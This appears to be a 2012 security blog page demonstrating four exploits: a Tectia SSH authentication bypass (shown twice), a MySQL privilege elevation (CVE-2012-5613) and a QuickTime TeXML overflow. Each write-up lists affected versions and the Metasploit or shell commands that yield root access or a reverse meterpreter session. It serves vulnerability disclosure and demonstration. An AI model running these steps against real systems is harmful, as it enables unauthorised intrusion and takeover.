Tectia SSH Server Authentication Bypass Metasploit Demo

04/12/2012Exploits, MetasploitSSH, Tectiawow

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01
Metasploit PoC the 2012-12-04

PoC provided by :

kingcope
bperry
sinn3r

Reference(s) :

Affected version(s) :

SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2

Tested on Centos 5.8 x86 with :

SSH Tectia Server 6.3.2-33

Description :

This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request before password authentication, allowing any remote user to bypass the login routine, and then gain access as root.

Commands :

use exploit/unix/ssh/tectia_passwd_changereq
set RHOST 192.168.178.34
set PAYLOAD cmd/unix/interact
exploit

id
uname -a
/sbin/ifconfig

CVE-2012-5613 MySQL Database Privilege Elevation 0day Exploit Demo

03/12/2012ExploitsCVE-2012-5613, kingcope, MySQL, MySQL 0day, Oraclewow

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01

PoC provided by :

kingcope

Reference(s) :

CVE-2012-5613
Full Disclosure Mailing-list
Red Hat Bugzilla

Affected version(s) :

MySQL 5.0
MySQL 5.1
Other ?

Tested on Centos 5.8 x86 with :

MySQL Server version 5.0.95 Source distribution

Description :

An attacker with access to a MySQL database through a user having some specific privileges, will be allowed, through this vulnerability to create a MySQL administrator user. The created user specified in the PoC script is by default “rootedbox2” with “rootedbox2” as password.

Commands :

On the target side :
CREATE DATABASE exampledb;
GRANT ALL PRIVILEGES ON exampledb.* TO user1@'192.168.178.26' IDENTIFIED BY 'test';
GRANT FILE ON *.* TO user1@'192.168.178.26' IDENTIFIED BY 'test'; 
FLUSH PRIVILEGES;

On the attacker side :
mysql -u user1 -h 192.168.178.34 -p exampledb -> allowed
mysql -u rootedbox2 -h 192.168.178.34 -p -> denied
perl mysql_privilege_elevation.pl 
mysql -u rootedbox2 -h 192.168.178.34 -p -> allowed

Tectia SSH Server Authentication Bypass Remote 0day Exploit Demo

02/12/2012ExploitsSSH, Tectiawow

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01

PoC provided by :

kingcope

Reference(s) :

Full Disclosure Mailing-list

Affected version(s) :

All versions of Tectia SSH Server

Tested on Centos 5.8 x86 with :

Tectia SSH Server 6.3.2.33

Description :

An attacker in the possession of a valid username of an SSH Tectia installation running on UNIX (verified on AIX/Linux) can login without a password. The bug is in the “SSH USERAUTH CHANGE REQUEST” routines which are there to allow a user to change their password. A bug in the code allows an attacker to login without a password by forcing a password change request prior to authentication.

Commands :

You're OpenSSH client should be patched with the diff file provided by kingcope in order to force the password reset request.

On the target :

ifconfig
uname -a
rpm -qi ssh-tectia-server-6.3.2-33

netstat -lntp

On the attacker :

ifconfig
uname -a

./ssh -lroot 192.168.178.34

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

02/12/2012Exploits, MetasploitApple, CVE-2012-3752, QuickTimewow

Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinate public release of the vulnerability the 2012-11-05
Metasploit PoC provided by juan vazquez the 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

Eric Romang Blog

aka wow on ZATAZ.com

Tectia SSH Server Authentication Bypass Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Centos 5.8 x86 with :

Description :

Commands :

CVE-2012-5613 MySQL Database Privilege Elevation 0day Exploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Centos 5.8 x86 with :

Description :

Commands :

Tectia SSH Server Authentication Bypass Remote 0day Exploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Centos 5.8 x86 with :

Description :

Commands :

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP Pro SP3 with :

Description :

Commands :